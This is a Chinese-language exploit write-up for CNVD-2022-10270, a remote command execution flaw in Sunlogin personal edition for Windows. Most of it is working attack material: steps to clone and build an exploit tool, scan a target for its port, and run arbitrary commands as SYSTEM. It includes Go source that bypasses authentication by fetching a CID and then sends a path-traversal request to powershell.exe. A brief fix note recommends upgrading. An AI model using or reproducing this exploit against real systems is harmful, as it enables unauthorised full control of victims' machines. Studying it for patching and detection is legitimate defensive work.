CNVD-2022-10270的向日葵个人版for Windows存在命令执行漏洞通告。攻击者可以通过此漏洞在目标主机上以SYSTEM权限执行任意命令,从而获取服务器控制权。
复现向日葵版本:11.0.0.33826
EXP
//EXP工具编译 git clone https://github.com/heyzm/sunlogin_rce_.git cd sunlogin_rce_/ go build main.go //扫描,得到端口49686 ./main -h 192.168.6.6 //rce,目标主机D盘下将生成test.go文件 ./main -c "echo 'hello world' >d:test.go" -h 192.168.6.6 -p 49686 -t rce原理
通过cgi-bin/rpc?action=verify-haras获取cid解决认证问题
通过/check?cmd=ping…/…/…/…/…/…/…/…/…/windows/system32/WindowsPowerShell/v1.0/powershell.exe+构造rce
func GetVerify() string { //获取Verify认证
client := resty.New().SetTimeout(3 * time.Second).SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) //忽略https证书错误,设置超时时间
resp, err := client.R().EnableTrace().Get("http://" + config.GetIp() + ":" + config.GetPort() + "/cgi-bin/rpc?action=verify-haras")
if err != nil {
//log.Println(err)
return ""
}
str := resp.Body()
body := string(str)
verify := fmt.Sprintf("%s", gjson.Get(body, "verify_string"))
return verify
}
func RunCmd(cmd string) string {
client := resty.New().SetTimeout(3 * time.Second).SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) //忽略https证书错误,设置超时时间
//fmt.Printf(GetVerify())
cmd = url.QueryEscape(cmd)
client.Header.Set("cookie","CID="+GetVerify())
resp, err := client.R().EnableTrace().Get("http://" + config.GetIp() + ":" + config.GetPort() + "/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+" + cmd)
if err != nil {
//log.Println(err)
return ""
}
str := resp.Body()
body := string(str)
return body
}
修复
更新官网最新的[V 12.5.0.44227(2022.02)])版本
参考https://ckcsec.cn/posts/5047f5b7/
